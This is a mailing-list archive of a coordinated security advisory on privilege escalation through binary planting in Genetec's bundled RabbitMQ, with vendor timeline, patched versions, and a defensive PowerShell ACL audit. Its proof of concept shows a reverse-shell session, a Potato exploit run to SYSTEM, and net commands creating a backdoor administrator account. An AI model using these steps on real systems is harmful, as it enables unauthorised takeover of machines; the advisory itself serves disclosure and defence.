SEC Consult SA-20260608-0 :: Privilege Escalation via Binary Planting in Genetec-provided RabbitMQ in multiple Genetec products
Full Disclosure mailing list archives


From: SEC Consult Vulnerability Lab via Fulldisclosure <fulldisclosure () seclists org>
Date: Mon, 8 Jun 2026 10:19:13 +0000

SEC Consult Vulnerability Lab Security Advisory < 20260608-0 >
=======================================================================
              title: Privilege Escalation via Binary Planting
            product: Genetec-provided RabbitMQ in multiple Genetec products
 vulnerable version: Multiple products, see below.
      fixed version: Multiple products, see below.
         CVE number: CVE-2026-25112
             impact: High
           homepage: https://www.genetec.com/products/unified-security/security-center
              found: 2026-03-02
                 by: Johannes Kruchem (Office Vienna)
                     Christian Hager (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Atos business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Leading technology provider of business intelligence, unified physical
security, public safety, and operations. Genetec develops open-platform
software, hardware, and cloud-based services for the physical security
and public safety industry. Its flagship product, Security Center,
unifies IP-based video surveillance, access control, and automatic
license plate recognition (ALPR) into one platform. A global innovator
since 1997, Genetec is headquartered in Montreal, Canada, and serves
enterprise and government organizations via an integrated network of
resellers, integrators, and consultants in over 159 countries. Genetec
was founded on the principle of innovation and remains at the forefront
of emerging technologies that unify physical security systems."

Source: https://www.linkedin.com/company/genetec/


Business recommendation:
------------------------
The vendor provides patches for multiple affected products; they should
be installed immediately.

SEC Consult highly recommends performing a thorough security review of the
product, conducted by security professionals, to identify and resolve potential
further security issues.


Vulnerability overview/description:
-----------------------------------
1) Local Privilege Escalation via Binary Planting (CVE-2026-25112)
Installing RabbitMQ through the Genetec Security Center installer creates the
directory `C:\ProgramData\Genetec\RabbitMQ` with write access for any
authenticated user. `erl.exe`, which runs as `NT AUTHORITY\LOCAL SERVICE`,
repeatedly attempts to execute a non-existent `handle.exe` from this directory.
A malicious `handle.exe` placed in `C:\ProgramData\Genetec\RabbitMQ` is therefore
invoked almost immediately in the LOCAL SERVICE context. Since the LOCAL SERVICE
account holds `SeImpersonatePrivilege`, a Rotten Potato style attack then
escalates privileges to SYSTEM.


Proof of concept:
-----------------
1) Local Privilege Escalation via Binary Planting (CVE-2026-25112)
Exploiting the LPE requires that RabbitMQ was installed via the Genetec Security
Center installer.

`erl.exe` looks for the executable `handle.exe` within the path
C:\ProgramData\Genetec\RabbitMQ, where it does not exist. As `erl.exe` runs in
the context of NT AUTHORITY\LOCAL SERVICE, a `handle.exe` found there is executed
in the same context. The path C:\ProgramData\Genetec\RabbitMQ is writable for all
users, so a malicious executable can be placed there as `handle.exe`. Planting an
executable that exploits Rotten Potato as `handle.exe` in
C:\ProgramData\Genetec\RabbitMQ results in privilege escalation to SYSTEM, because
SeImpersonatePrivilege is enabled for the LOCAL SERVICE account.

[ genetec_handle_exe.png ]
Figure 1: Process explorer showing handle.exe calls

[ genetec_reverse_shell_whoami_priv.png ]
Figure 2: Established reverse shell, showing privileges including SeImpersonatePrivilege


The following listing shows the successful exploitation:
------------------------------------
PS C:\Users\...\Client> .\client.exe
[+] Listening on 0.0.0.0:9999 ...
[+] Waiting for incoming reverse shell connection ...

[+] Connection from 127.0.0.1:54674
[+] Shell session active - type commands (exit to quit)
----------------------------------------------------

Microsoft Windows [Version 10.0.26200.7840]
(c) Microsoft Corporation. All rights reserved.

C:\ProgramData\Genetec\RabbitMQ> SigmaPotato.exe

C:\ProgramData\Genetec\RabbitMQ> whoami
nt authority\system

C:\ProgramData\Genetec\RabbitMQ> net user privesc [redacted] /ADD
The command completed successfully.

C:\ProgramData\Genetec\RabbitMQ> net localgroup Administrators privesc /ADD
The command completed successfully.

C:\ProgramData\Genetec\RabbitMQ> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
privesc
The command completed successfully.
------------------------------------


Vulnerable / tested versions:
-----------------------------
The following product has been tested by SEC Consult:
* Genetec Mission Control

The following products were affected as well according to the vendor:

* Genetec-provided RabbitMQ (< v3.13.7.19)
* Genetec Mission Control™ (< v3.4.1.0)
* Genetec Industrial IoT (IIoT) — 5.x line (< v5.5.118.0)
* Genetec Industrial IoT (IIoT) — 6.x line (< v6.0.196.0)
* Genetec Airport Operational Manager (AOM) (< v1.6)
* Genetec Restricted Security Area (RSA) Surveillance (< v5.2.1)
* Genetec Inter-System (IS) Gateway (< v1.2)
* Sipelia™ (< v2.11)

All other Genetec products are not affected.


Vendor contact timeline:
------------------------
2026-03-03: Contacting vendor through Genetec PSIRT (security () genetec com)
2026-03-03: Confirmed receipt by Genetec
2026-03-10: Vendor confirmed vulnerability. Responded already with assigned
            CVE-2026-25112.
2026-03-12: Thanking vendor for professional and quick response. Asking for the
            patch development timeline.
2026-03-12: Vendor responds that their SLO is 60 days for high-severity issues.
            RabbitMQ prior to 4.2.3 is affected, used by multiple Genetec products.
            Vendor will also provide a workaround if immediate update is not possible.
2026-03-13: Confirming alignment of coordinated advisory disclosure, asking for a list
            of affected products.
2026-03-13: Comprehensive list will be shared when all details are finalized.
2026-03-25: Vendor informs us that they are still actively working on it.
2026-04-07: Vendor informs us that they are still actively working on it.
2026-04-21: Vendor informs us that they are still actively working on it.
2026-04-23: Asking whether affected products are already known. Vendor will
            provide additional information when patched versions are confirmed.
2026-05-22: Vendor provides detailed list of affected products and version
            numbers as well as hot fix information & workaround. The CVE
            will be published on 25th May.
2026-05-26: Informing vendor that we will publish in June because of public
            holidays.
            Vendor provides published CVE URL as well as advisory.
2026-06-03: Informing vendor about planned SEC Consult advisory release for 8th June.
2026-06-08: Coordinated release of advisory.


Solution:
---------
The vendor provides updated versions for multiple products as well as a hotfix.

* For new deployments, Genetec-provided RabbitMQ 3.13.7.19 is available.
  New deployments can use the Genetec-provided RabbitMQ 3.13.7.19 standalone installer
  safely without needing to run the mitigation utility.

* For existing deployments, customers running an affected version should execute
  the mitigation utility (SecurityUtility_CVE-2026-25112_RabbitMQ.exe) available in GTAP
  as soon as possible.

Genetec provided the following software versions which mitigate the issue:

* Genetec-provided RabbitMQ (3.13.7.19 and later)
* Genetec Mission Control™ (3.4.1.0 and later)
* Genetec Industrial IoT (IIoT) — 5.x line (5.5.118.0 and later)
* Genetec Industrial IoT (IIoT) — 6.x line (6.0.196.0 and later)
* Genetec Airport Operational Manager (AOM) (1.6 and later)
* Genetec Restricted Security Area (RSA) (5.2.1 and later)
* Genetec Inter-System (IS) Gateway (1.2 and later)
* Sipelia™ (2.11 and later; RabbitMQ no longer used starting from v2.11)

A hotfix is available for all affected products:
SecurityUtility_CVE-2026-25112_RabbitMQ.exe

Security advisory of the vendor Genetec:
https://resources.genetec.com/security-advisories/vulnerability-affecting-rabbitmq-deployment-in-genetec-products


Workaround:
-----------
If customers cannot apply the mitigation utility in a timely fashion, they should
restrict access to the following folder to admin users: ProgramData\Genetec\RabbitMQ
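The following PowerShell script is an added example and is not part of the SEC
Consult advisory or of Genetec's mitigation utility. It covers both the
vulnerability description above (a directory on a LOCAL SERVICE binary search
path that broad groups can write to, and the `handle.exe` that should never be
present there) and this workaround. `Test-RabbitMqPlantingExposure` audits the
directory ACL and reports any unexpected `handle.exe`; `Protect-RabbitMqDirectory`
removes write rights for the broad groups. The directory path is the one stated
in the advisory; the list of broad principals, the function names, and the choice
to leave those groups with read/execute (rather than removing all non-admin
access, as the vendor's wording suggests) are assumptions made here so that the
RabbitMQ service account keeps read access; verify on a test system that the
service still starts after applying it.

```powershell
# Added example (not from the SEC Consult advisory or Genetec): audit and harden the
# directory that the advisory identifies as the binary-planting location.
# Assumption: the path is the one from the advisory; remediation needs an elevated shell.
$RabbitMqDir = 'C:\ProgramData\Genetec\RabbitMQ'

# Broad principals that must not be able to create or replace files on a path that a
# service running as LOCAL SERVICE searches for executables (assumed list).
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow planting or swapping a file. Generic rights (GENERIC_WRITE etc.)
# appear as large negative integers in ACEs and are not decoded by this example.
$RiskyRights = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, AppendData, Write, Modify, FullControl, Delete, ChangePermissions, TakeOwnership'

function Test-RabbitMqPlantingExposure {
    param([string]$Path = $RabbitMqDir)

    if (-not (Test-Path -LiteralPath $Path -PathType Container)) {
        Write-Verbose "$Path not present; nothing to audit."
        return @()
    }

    $acl = Get-Acl -LiteralPath $Path
    $findings = @(foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $RiskyRights) -eq 0) { continue }
        [pscustomobject]@{
            Kind    = 'WritableAce'
            Subject = $ace.IdentityReference.Value
            Detail  = "$($ace.FileSystemRights) (inherited: $($ace.IsInherited))"
        }
    })

    # The advisory states that handle.exe normally does not exist in this directory,
    # so its mere presence is an indicator of a planted binary worth preserving.
    $planted = Join-Path -Path $Path -ChildPath 'handle.exe'
    if (Test-Path -LiteralPath $planted -PathType Leaf) {
        $hash = (Get-FileHash -LiteralPath $planted -Algorithm SHA256).Hash
        $sig  = (Get-AuthenticodeSignature -LiteralPath $planted).Status
        $findings += [pscustomobject]@{
            Kind    = 'UnexpectedBinary'
            Subject = $planted
            Detail  = "owner=$((Get-Acl -LiteralPath $planted).Owner) sha256=$hash signature=$sig"
        }
    }
    return $findings
}

function Protect-RabbitMqDirectory {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([string]$Path = $RabbitMqDir)

    if (-not $PSCmdlet.ShouldProcess($Path, 'Remove write access for broad principals')) { return }

    # Step 1: stop inheriting from C:\ProgramData so permissive parent entries cannot
    # reappear. Inherited ACEs cannot be edited in memory, so persist and re-read first.
    $acl = Get-Acl -LiteralPath $Path
    $acl.SetAccessRuleProtection($true, $true)
    Set-Acl -LiteralPath $Path -AclObject $acl
    $acl = Get-Acl -LiteralPath $Path

    # Step 2: replace each risky Allow ACE for a broad principal with read/execute only,
    # keeping its inheritance scope so files below the directory stay covered.
    foreach ($ace in @($acl.Access)) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $RiskyRights) -eq 0) { continue }
        $null = $acl.RemoveAccessRule($ace)
        $readOnly = New-Object System.Security.AccessControl.FileSystemAccessRule($ace.IdentityReference, 'ReadAndExecute', $ace.InheritanceFlags, $ace.PropagationFlags, 'Allow')
        $acl.AddAccessRule($readOnly)
    }
    Set-Acl -LiteralPath $Path -AclObject $acl
}

# Usage: audit first, then apply the hardening (use -WhatIf to preview the change).
Test-RabbitMqPlantingExposure | Format-Table -AutoSize
```

An empty result from `Test-RabbitMqPlantingExposure` means no broad principal
holds write-type rights on the directory and no `handle.exe` is present. Any
`UnexpectedBinary` finding should be treated as a possible compromise: keep the
file for analysis and check which `erl.exe` instances have executed it before
removing it.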


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application: https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices: https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
X: https://x.com/sec_consult

EOF C. Hager, J. Kruchem / @2026

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Article source: https://seclists.org/fulldisclosure/2026/Jun/2